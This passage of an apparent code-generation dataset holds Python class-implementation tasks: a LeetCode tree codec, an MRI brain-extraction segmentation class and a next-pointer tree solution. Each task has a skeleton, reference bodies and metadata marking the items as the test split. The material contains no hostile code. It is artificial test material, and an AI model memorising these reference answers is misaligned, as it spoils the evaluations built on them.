class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def rserialize(root, string):\n \"\"\" a recursive helper function for the serialize() function.\"\"\"\n if root is None:\n string += 'None,'\n else:\n string += str(root.val) + ','\n string = rserialize(root.left, string)\n string = rserialize(root.right, string)\n return string\n return rserialize(root, '')\n<|end_body_0|>\n\n<|body_start_1|>\n def rdeserialize(l):\n \"\"\" a recursive helper function for deserialization.\"\"\"\n if l[0] == 'None':\n l.pop(0)\n return None\n root = Node(l[0])\n l.pop(0)\n root.left = rdeserialize(l)\n root.right = rdeserialize(l)\n return root\n data_list = data.split(',')\n root = rdeserialize(data_list)\n return root\n<|end_body_1|>\n", "revision_id": "f831fd9603592ae5bee3679924f962a3ebce381c", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n def rserialize(root, string):\n \"\"\" a recursive helper function for the serialize() function.\"\"\"\n if root is None:\n string += 'None,'\n else:\n string += str(root.val) + ','\n string = rserialize(root.left, string)\n string = rserialize(root.right, string)\n return string\n return rserialize(root, '')\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n def rdeserialize(l):\n \"\"\" a recursive helper function for deserialization.\"\"\"\n if l[0] == 'None':\n l.pop(0)\n return None\n root = Node(l[0])\n l.pop(0)\n root.left = rdeserialize(l)\n root.right = rdeserialize(l)\n return root\n data_list = data.split(',')\n root = rdeserialize(data_list)\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "topic13_tree/T297_Codec/interview.py", "source_repo": "GongFuXiong/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "74d1238680fb22a67c83447af0fe73406e31bc75", "bodies": ["self.model = MRIBET().cuda()\nif weight_path is not None:\n weight = torch.load(weight_path, map_location='cuda:0')\n self.model.load_state_dict(weight['net'])", "read_data = nib.load(path)\ndata = read_data.get_fdata().astype(np.float32)\nif img_type == 'T1':\n pass\nelif img_type == 'MRA':\n w_min = np.percentile(data, min_percent)\n w_max = np.percentile(data, max_percent)\n width = w_max - w_min + 1\n center = w_min + width / 2\n data = ((data - center) / width + 0.5) * (out_max - out_min)\n data = np.piecewise(data, [data <= out_min, data >= out_max], [out_min, out_max, lambda data: data])\ndata = torch.from_numpy(data)[np.newaxis, np.newaxis, ...]\ndata = data.cuda()\nreturn (data, read_data)", "kernel = np.ones((5, 5), np.int8)\ndata = [cv2.morphologyEx(data[:, :, z], cv2.MORPH_OPEN, kernel) for z in range(data.shape[2])]\ndata = np.transpose(np.asarray(data), (1, 2, 0))\nimg_labels, num_labels = ndimage.label(data)\nsizes = ndimage.sum(data, img_labels, range(num_labels + 1))\nremove_cluster = sizes < np.max(sizes)\nremove_pixel = remove_cluster[img_labels]\ndata[remove_pixel] = 0\ndata[data > 0] = 1\ndata = ndimage.binary_fill_holes(data).astype(np.float32)\nreturn data", "data, read_data = self._preprocessing(path, img_type=img_type)\nself.model.eval()\nmask = np.zeros(np.squeeze(data).shape)\nfor z in range(mask.shape[2]):\n output = self.model(data[:, :, :, :, z])\n output = torch.sigmoid(output)\n output = output.cpu().detach().numpy().squeeze()\n mask[:, :, z] = np.where(output >= thres, 1, 0)\nmask = self._postprocessing(mask)\nmask = mask.astype(np.uint8)\nif save_path:\n mask_save = nib.Nifti1Image(mask, read_data.affine, read_data.header)\n nib.save(mask_save, save_path)\n org_img = read_data.get_fdata()\n img_strip_save = nib.Nifti1Image(np.where(mask == 1, org_img, 0), read_data.affine, read_data.header)\n nib.save(img_strip_save, path.replace('.nii', '_stripped.nii'))\nreturn (np.squeeze(data), mask)"], "bodies_text": "<|body_start_0|>\n self.model = MRIBET().cuda()\n if weight_path is not None:\n weight = torch.load(weight_path, map_location='cuda:0')\n self.model.load_state_dict(weight['net'])\n<|end_body_0|>\n\n<|body_start_1|>\n read_data = nib.load(path)\n data = read_data.get_fdata().astype(np.float32)\n if img_type == 'T1':\n pass\n elif img_type == 'MRA':\n w_min = np.percentile(data, min_percent)\n w_max = np.percentile(data, max_percent)\n width = w_max - w_min + 1\n center = w_min + width / 2\n data = ((data - center) / width + 0.5) * (out_max - out_min)\n data = np.piecewise(data, [data <= out_min, data >= out_max], [out_min, out_max, lambda data: data])\n data = torch.from_numpy(data)[np.newaxis, np.newaxis, ...]\n data = data.cuda()\n return (data, read_data)\n<|end_body_1|>\n\n<|body_start_2|>\n kernel = np.ones((5, 5), np.int8)\n data = [cv2.morphologyEx(data[:, :, z], cv2.MORPH_OPEN, kernel) for z in range(data.shape[2])]\n data = np.transpose(np.asarray(data), (1, 2, 0))\n img_labels, num_labels = ndimage.label(data)\n sizes = ndimage.sum(data, img_labels, range(num_labels + 1))\n remove_cluster = sizes < np.max(sizes)\n remove_pixel = remove_cluster[img_labels]\n data[remove_pixel] = 0\n data[data > 0] = 1\n data = ndimage.binary_fill_holes(data).astype(np.float32)\n return data\n<|end_body_2|>\n\n<|body_start_3|>\n data, read_data = self._preprocessing(path, img_type=img_type)\n self.model.eval()\n mask = np.zeros(np.squeeze(data).shape)\n for z in range(mask.shape[2]):\n output = self.model(data[:, :, :, :, z])\n output = torch.sigmoid(output)\n output = output.cpu().detach().numpy().squeeze()\n mask[:, :, z] = np.where(output >= thres, 1, 0)\n mask = self._postprocessing(mask)\n mask = mask.astype(np.uint8)\n if save_path:\n mask_save = nib.Nifti1Image(mask, read_data.affine, read_data.header)\n nib.save(mask_save, save_path)\n org_img = read_data.get_fdata()\n img_strip_save = nib.Nifti1Image(np.where(mask == 1, org_img, 0), read_data.affine, read_data.header)\n nib.save(img_strip_save, path.replace('.nii', '_stripped.nii'))\n return (np.squeeze(data), mask)\n<|end_body_3|>\n", "class_docstring": "", "class_name": "MRI_BET", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MRI_BET:\n\n def __init__(self, weight_path: str=None):\n \"\"\"Initialize the model with its weight. Args: (string) weight_path : model's weight path\"\"\"\n <|body_0|>\n\n def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor:\n \"\"\"Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)\"\"\"\n <|body_1|>\n\n def _postprocessing(self, data: np.array) -> np.array:\n \"\"\"Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)\"\"\"\n <|body_2|>\n\n def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]:\n \"\"\"Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. (float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.model = MRIBET().cuda()\n if weight_path is not None:\n weight = torch.load(weight_path, map_location='cuda:0')\n self.model.load_state_dict(weight['net'])\n<|end_body_0|>\n\n<|body_start_1|>\n read_data = nib.load(path)\n data = read_data.get_fdata().astype(np.float32)\n if img_type == 'T1':\n pass\n elif img_type == 'MRA':\n w_min = np.percentile(data, min_percent)\n w_max = np.percentile(data, max_percent)\n width = w_max - w_min + 1\n center = w_min + width / 2\n data = ((data - center) / width + 0.5) * (out_max - out_min)\n data = np.piecewise(data, [data <= out_min, data >= out_max], [out_min, out_max, lambda data: data])\n data = torch.from_numpy(data)[np.newaxis, np.newaxis, ...]\n data = data.cuda()\n return (data, read_data)\n<|end_body_1|>\n\n<|body_start_2|>\n kernel = np.ones((5, 5), np.int8)\n data = [cv2.morphologyEx(data[:, :, z], cv2.MORPH_OPEN, kernel) for z in range(data.shape[2])]\n data = np.transpose(np.asarray(data), (1, 2, 0))\n img_labels, num_labels = ndimage.label(data)\n sizes = ndimage.sum(data, img_labels, range(num_labels + 1))\n remove_cluster = sizes < np.max(sizes)\n remove_pixel = remove_cluster[img_labels]\n data[remove_pixel] = 0\n data[data > 0] = 1\n data = ndimage.binary_fill_holes(data).astype(np.float32)\n return data\n<|end_body_2|>\n\n<|body_start_3|>\n data, read_data = self._preprocessing(path, img_type=img_type)\n self.model.eval()\n mask = np.zeros(np.squeeze(data).shape)\n for z in range(mask.shape[2]):\n output = self.model(data[:, :, :, :, z])\n output = torch.sigmoid(output)\n output = output.cpu().detach().numpy().squeeze()\n mask[:, :, z] = np.where(output >= thres, 1, 0)\n mask = self._postprocessing(mask)\n mask = mask.astype(np.uint8)\n if save_path:\n mask_save = nib.Nifti1Image(mask, read_data.affine, read_data.header)\n nib.save(mask_save, save_path)\n org_img = read_data.get_fdata()\n img_strip_save = nib.Nifti1Image(np.where(mask == 1, org_img, 0), read_data.affine, read_data.header)\n nib.save(img_strip_save, path.replace('.nii', '_stripped.nii'))\n return (np.squeeze(data), mask)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000252", "length_bytes": 8369, "license_type": "permissive", "methods": [{"docstring": "Initialize the model with its weight. Args: (string) weight_path : model's weight path", "name": "__init__", "signature": "def __init__(self, weight_path: str=None)"}, {"docstring": "Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)", "name": "_preprocessing", "signature": "def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor"}, {"docstring": "Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)", "name": "_postprocessing", "signature": "def _postprocessing(self, data: np.array) -> np.array"}, {"docstring": "Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. (float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask", "name": "predict", "signature": "def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_003963", "prompt": "Implement the Python class `MRI_BET` described below.\n\nClass description:\nImplement the MRI_BET class.\n\nMethod signatures and docstrings:\n- def __init__(self, weight_path: str=None): Initialize the model with its weight. Args: (string) weight_path : model's weight path\n- def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor: Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)\n- def _postprocessing(self, data: np.array) -> np.array: Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)\n- def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]: Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. (float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask", "prompted_full_text": "Implement the Python class `MRI_BET` described below.\n\nClass description:\nImplement the MRI_BET class.\n\nMethod signatures and docstrings:\n- def __init__(self, weight_path: str=None): Initialize the model with its weight. Args: (string) weight_path : model's weight path\n- def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor: Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)\n- def _postprocessing(self, data: np.array) -> np.array: Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)\n- def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]: Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. (float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask\n\n<|skeleton|>\nclass MRI_BET:\n\n def __init__(self, weight_path: str=None):\n \"\"\"Initialize the model with its weight. Args: (string) weight_path : model's weight path\"\"\"\n <|body_0|>\n\n def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor:\n \"\"\"Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)\"\"\"\n <|body_1|>\n\n def _postprocessing(self, data: np.array) -> np.array:\n \"\"\"Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)\"\"\"\n <|body_2|>\n\n def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]:\n \"\"\"Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. (float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.model = MRIBET().cuda()\n if weight_path is not None:\n weight = torch.load(weight_path, map_location='cuda:0')\n self.model.load_state_dict(weight['net'])\n<|end_body_0|>\n\n<|body_start_1|>\n read_data = nib.load(path)\n data = read_data.get_fdata().astype(np.float32)\n if img_type == 'T1':\n pass\n elif img_type == 'MRA':\n w_min = np.percentile(data, min_percent)\n w_max = np.percentile(data, max_percent)\n width = w_max - w_min + 1\n center = w_min + width / 2\n data = ((data - center) / width + 0.5) * (out_max - out_min)\n data = np.piecewise(data, [data <= out_min, data >= out_max], [out_min, out_max, lambda data: data])\n data = torch.from_numpy(data)[np.newaxis, np.newaxis, ...]\n data = data.cuda()\n return (data, read_data)\n<|end_body_1|>\n\n<|body_start_2|>\n kernel = np.ones((5, 5), np.int8)\n data = [cv2.morphologyEx(data[:, :, z], cv2.MORPH_OPEN, kernel) for z in range(data.shape[2])]\n data = np.transpose(np.asarray(data), (1, 2, 0))\n img_labels, num_labels = ndimage.label(data)\n sizes = ndimage.sum(data, img_labels, range(num_labels + 1))\n remove_cluster = sizes < np.max(sizes)\n remove_pixel = remove_cluster[img_labels]\n data[remove_pixel] = 0\n data[data > 0] = 1\n data = ndimage.binary_fill_holes(data).astype(np.float32)\n return data\n<|end_body_2|>\n\n<|body_start_3|>\n data, read_data = self._preprocessing(path, img_type=img_type)\n self.model.eval()\n mask = np.zeros(np.squeeze(data).shape)\n for z in range(mask.shape[2]):\n output = self.model(data[:, :, :, :, z])\n output = torch.sigmoid(output)\n output = output.cpu().detach().numpy().squeeze()\n mask[:, :, z] = np.where(output >= thres, 1, 0)\n mask = self._postprocessing(mask)\n mask = mask.astype(np.uint8)\n if save_path:\n mask_save = nib.Nifti1Image(mask, read_data.affine, read_data.header)\n nib.save(mask_save, save_path)\n org_img = read_data.get_fdata()\n img_strip_save = nib.Nifti1Image(np.where(mask == 1, org_img, 0), read_data.affine, read_data.header)\n nib.save(img_strip_save, path.replace('.nii', '_stripped.nii'))\n return (np.squeeze(data), mask)\n<|end_body_3|>\n", "revision_id": "158a74985074f95fcd6a345c310903936dd2adbe", "skeleton": "<|skeleton|>\nclass MRI_BET:\n\n def __init__(self, weight_path: str=None):\n \"\"\"Initialize the model with its weight. Args: (string) weight_path : model's weight path\"\"\"\n <|body_0|>\n\n def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor:\n \"\"\"Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)\"\"\"\n <|body_1|>\n\n def _postprocessing(self, data: np.array) -> np.array:\n \"\"\"Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)\"\"\"\n <|body_2|>\n\n def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]:\n \"\"\"Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. (float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MRI_BET:\n def __init__(self, weight_path: str=None):\n \"\"\"Initialize the model with its weight. Args: (string) weight_path : model's weight path\"\"\"\n self.model = MRIBET().cuda()\n if weight_path is not None:\n weight = torch.load(weight_path, map_location='cuda:0')\n self.model.load_state_dict(weight['net'])\n\n def _preprocessing(self, path: str, img_type: str, min_percent: float=40.0, max_percent: float=98.5, out_min: int=0, out_max: int=1) -> torch.Tensor:\n \"\"\"Preprocess the image from the path Args: (string) path : absolute path of data (string) img_type : MRI modality type for applying different preprocessing according to MRI modality (float) min_percent : Min percentile to compute, which must be between 0 and 100 inclusive (default : 40) (float) max_percent : Max percentile to compute, which must be between 0 and 100 inclusive (default : 98.5) (integer) out_min : minimum value of output (default : 0) (integer) out_max : maximum value of output (default : 1) Return: (numpy ndarray) data with shape (1, h, w, d, 1)\"\"\"\n read_data = nib.load(path)\n data = read_data.get_fdata().astype(np.float32)\n if img_type == 'T1':\n pass\n elif img_type == 'MRA':\n w_min = np.percentile(data, min_percent)\n w_max = np.percentile(data, max_percent)\n width = w_max - w_min + 1\n center = w_min + width / 2\n data = ((data - center) / width + 0.5) * (out_max - out_min)\n data = np.piecewise(data, [data <= out_min, data >= out_max], [out_min, out_max, lambda data: data])\n data = torch.from_numpy(data)[np.newaxis, np.newaxis, ...]\n data = data.cuda()\n return (data, read_data)\n\n def _postprocessing(self, data: np.array) -> np.array:\n \"\"\"Postprocess the predicted data to reduce FP:wq Args: (numpy ndarray) 3d data with shape (h, w, d) Return: (numpy ndarray) 3d data with shape (h, w, d)\"\"\"\n kernel = np.ones((5, 5), np.int8)\n data = [cv2.morphologyEx(data[:, :, z], cv2.MORPH_OPEN, kernel) for z in range(data.shape[2])]\n data = np.transpose(np.asarray(data), (1, 2, 0))\n img_labels, num_labels = ndimage.label(data)\n sizes = ndimage.sum(data, img_labels, range(num_labels + 1))\n remove_cluster = sizes < np.max(sizes)\n remove_pixel = remove_cluster[img_labels]\n data[remove_pixel] = 0\n data[data > 0] = 1\n data = ndimage.binary_fill_holes(data).astype(np.float32)\n return data\n\n def predict(self, path: str, img_type: str='T1', save_path: Optional[str]=None, thres: float=0.5) -> Tuple[np.array, np.array]:\n \"\"\"Brain tissue segmentation Args: (string) path : absolute path of data (string) img_type : MRI modality type('T1' for T1-weighted MRI, 'MRA' for MR angiography) (string) save_path : If save_path is set, the mask and the skull-stripped image will be saved. (float) thres : probability threshold to make a mask pixel white (default : 0.5) Return: (numpy ndarray) 3d brain tissue mask\"\"\"\n data, read_data = self._preprocessing(path, img_type=img_type)\n self.model.eval()\n mask = np.zeros(np.squeeze(data).shape)\n for z in range(mask.shape[2]):\n output = self.model(data[:, :, :, :, z])\n output = torch.sigmoid(output)\n output = output.cpu().detach().numpy().squeeze()\n mask[:, :, z] = np.where(output >= thres, 1, 0)\n mask = self._postprocessing(mask)\n mask = mask.astype(np.uint8)\n if save_path:\n mask_save = nib.Nifti1Image(mask, read_data.affine, read_data.header)\n nib.save(mask_save, save_path)\n org_img = read_data.get_fdata()\n img_strip_save = nib.Nifti1Image(np.where(mask == 1, org_img, 0), read_data.affine, read_data.header)\n nib.save(img_strip_save, path.replace('.nii', '_stripped.nii'))\n return (np.squeeze(data), mask)\n", "source": "the_stack_v2_python_sparse", "source_path": "medimodule/Brain/module.py", "source_repo": "mi2rl/MI2RLNet", "split": "test", "star_events_count": 13} {"blob_id": "835c6a48b1e3ec48fba6dc1e46224544165a4300", "bodies": ["if not root or not root.left:\n return root\npre = root\nwhile pre.left:\n cur = pre\n while cur:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n cur = cur.next\n pre = pre.left\nreturn root", "if not root:\n return root\nqueue = [(root, 0)]\nwhile queue:\n cur, depth = queue.pop(0)\n if cur.left:\n queue.append((cur.left, depth + 1))\n if cur.right:\n queue.append((cur.right, depth + 1))\n if queue and queue[0][1] == depth:\n cur.next = queue[0][0]\nreturn root", "if not root or not root.left:\n return root\nroot.left.next = root.right\nif root.next:\n root.right.next = root.next.left\nself.connect3(root.left)\nself.connect3(root.right)\nreturn root"], "bodies_text": "<|body_start_0|>\n if not root or not root.left:\n return root\n pre = root\n while pre.left:\n cur = pre\n while cur:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n cur = cur.next\n pre = pre.left\n return root\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return root\n queue = [(root, 0)]\n while queue:\n cur, depth = queue.pop(0)\n if cur.left:\n queue.append((cur.left, depth + 1))\n if cur.right:\n queue.append((cur.right, depth + 1))\n if queue and queue[0][1] == depth:\n cur.next = queue[0][0]\n return root\n<|end_body_1|>\n\n<|body_start_2|>\n if not root or not root.left:\n return root\n root.left.next = root.right\n if root.next:\n root.right.next = root.next.left\n self.connect3(root.left)\n self.connect3(root.right)\n return root\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def connect(self, root):\n \"\"\"' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node\"\"\"\n <|body_0|>\n\n def connect2(self, root):\n \"\"\"bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node\"\"\"\n <|body_1|>\n\n def connect3(self, root):\n \"\"\"' 递归版 :type root: Node :rtype: Node\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root or not root.left:\n return root\n pre = root\n while pre.left:\n cur = pre\n while cur:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n cur = cur.next\n pre = pre.left\n return root\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return root\n queue = [(root, 0)]\n while queue:\n cur, depth = queue.pop(0)\n if cur.left:\n queue.append((cur.left, depth + 1))\n if cur.right:\n queue.append((cur.right, depth + 1))\n if queue and queue[0][1] == depth:\n cur.next = queue[0][0]\n return root\n<|end_body_1|>\n\n<|body_start_2|>\n if not root or not root.left:\n return root\n root.left.next = root.right\n if root.next:\n root.right.next = root.next.left\n self.connect3(root.left)\n self.connect3(root.right)\n return root\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000253", "length_bytes": 3426, "license_type": "no_license", "methods": [{"docstring": "' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node", "name": "connect", "signature": "def connect(self, root)"}, {"docstring": "bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node", "name": "connect2", "signature": "def connect2(self, root)"}, {"docstring": "' 递归版 :type root: Node :rtype: Node", "name": "connect3", "signature": "def connect3(self, root)"}], "n_methods": 3, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def connect(self, root): ' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node\n- def connect2(self, root): bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node\n- def connect3(self, root): ' 递归版 :type root: Node :rtype: Node", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def connect(self, root): ' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node\n- def connect2(self, root): bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node\n- def connect3(self, root): ' 递归版 :type root: Node :rtype: Node\n\n<|skeleton|>\nclass Solution:\n\n def connect(self, root):\n \"\"\"' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node\"\"\"\n <|body_0|>\n\n def connect2(self, root):\n \"\"\"bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node\"\"\"\n <|body_1|>\n\n def connect3(self, root):\n \"\"\"' 递归版 :type root: Node :rtype: Node\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root or not root.left:\n return root\n pre = root\n while pre.left:\n cur = pre\n while cur:\n cur.left.next = cur.right\n if cur.next:\n cur.right.next = cur.next.left\n cur = cur.next\n pre = pre.left\n return root\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return root\n queue = [(root, 0)]\n while queue:\n cur, depth = queue.pop(0)\n if cur.left:\n queue.append((cur.left, depth + 1))\n if cur.right:\n queue.append((cur.right, depth + 1))\n if queue and queue[0][1] == depth:\n cur.next = queue[0][0]\n return root\n<|end_body_1|>\n\n<|body_start_2|>\n if not root or not root.left:\n return root\n root.left.next = root.right\n if root.next:\n root.right.next = root.next.left\n self.connect3(root.left)\n self.connect3(root.right)\n return root\n<|end_body_2|>\n", "revision_id": "5d3574ccd282d0146c83c286ae28d8baaabd4910", "skeleton": "<|skeleton|>\nclass Solution:\n\n def connect(self, root):\n \"\"\"' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node\"\"\"\n <|body_0|>\n\n def connect2(self, root):\n \"\"\"bfs遍历每一层 下一个节点在同一个节点的时候next指向下一个节点 不符合常数空间要求 :type root: Node :rtype: Node\"\"\"\n <|body_1|>\n\n def connect3(self, root):\n \"\"\"' 递归版 :type root: Node :rtype: Node\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def connect(self, root):\n \"\"\"' 修已改版bfs 只使用常数项空间 经有上一层的next了,所以就不需要队列来存储了 :type root: Node :rtype: Node\"\"\"\n if not root or not root.left:\n 